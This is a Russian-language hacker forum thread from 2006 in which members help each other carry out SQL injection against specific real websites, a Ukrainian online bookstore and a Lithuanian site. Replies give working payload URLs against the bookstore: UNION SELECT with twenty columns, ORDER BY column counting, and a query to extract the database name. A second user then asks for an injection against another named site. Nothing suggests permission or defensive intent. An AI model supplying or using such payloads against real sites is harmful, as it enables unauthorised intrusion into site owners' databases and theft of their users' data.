HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-injection
  #1  
Старый 02.05.2006, 12:24
[alg0n
Новичок
Регистрация: 02.05.2006
Сообщений: 2
С нами: 10539786

Репутация: 0
Unhappy SQL-injection

Помогите плизз! Я обнаружил возможность sql-injection на сайте :
http://kniga.com.ua/index.php?Lev=product_info&id=881'
Пробовал так :
http://kniga.com.ua/index.php?Lev=pr...+select+null/*
и так :
http://kniga.com.ua/index.php?Lev=pr...ct+null,null/*
Уже практически все попробовал. Нифига. Или ошибка mysql_fetch_array вылезает или страница с книгой открывается.
Может я что-то в синтаксисе упустил?
 
Ответить с цитированием

  #2  
Старый 02.05.2006, 13:06
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
 
Ответить с цитированием

  #3  
Старый 02.05.2006, 13:46
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
С нами: 10863746

Репутация: 519
По умолчанию

Цитата:
Сообщение от virgoz  
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
[flame]
в этом случае проще количество столбцов перебирать вот таким способом:
__http://site.com/index.php?Lev=product_info&id=-1'+order by x/*
x = 1 ... n
Если при x = n вылетает ошибка то количество столбцов n-1
В этом случае ошибка вылетает при х=21
http://kniga.com.ua/index.php?Lev=product_info&id=-883' order by 21/*
[/flame]
ЗЫ: сорри за флейм просто не удержался и запостил когда увидел такую длинную ссылку
 
Ответить с цитированием

  #4  
Старый 02.05.2006, 16:03
[alg0n
Новичок
Регистрация: 02.05.2006
Сообщений: 2
С нами: 10539786

Репутация: 0
Question

А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?
 
Ответить с цитированием

  #5  
Старый 21.05.2006, 13:15
Metvill
Новичок
Регистрация: 21.05.2006
Сообщений: 7
С нами: 10512338

Репутация: 0
По умолчанию

Цитата:
Сообщение от [alg0n  
А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,DATABASE(),4,5,6,7,8,9,10,11 ,12,13,14 ,15,16,17,18,19,20/*

Народ, может и не тут пишу, но нужно узнать возмжна ли sql-injection на сайте http://www.e-d.lt/?ru=1117522100' и если можно пример, для меня это очень важно.

Последний раз редактировалось Metvill; 24.05.2006 в 16:57..
 
Ответить с цитированием

  #6  
Старый 24.05.2006, 16:57
Metvill
Новичок
Регистрация: 21.05.2006
Сообщений: 7
С нами: 10512338

Репутация: 0
По умолчанию

а вопрос то кажется несложным, чтож так никто и не знает?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.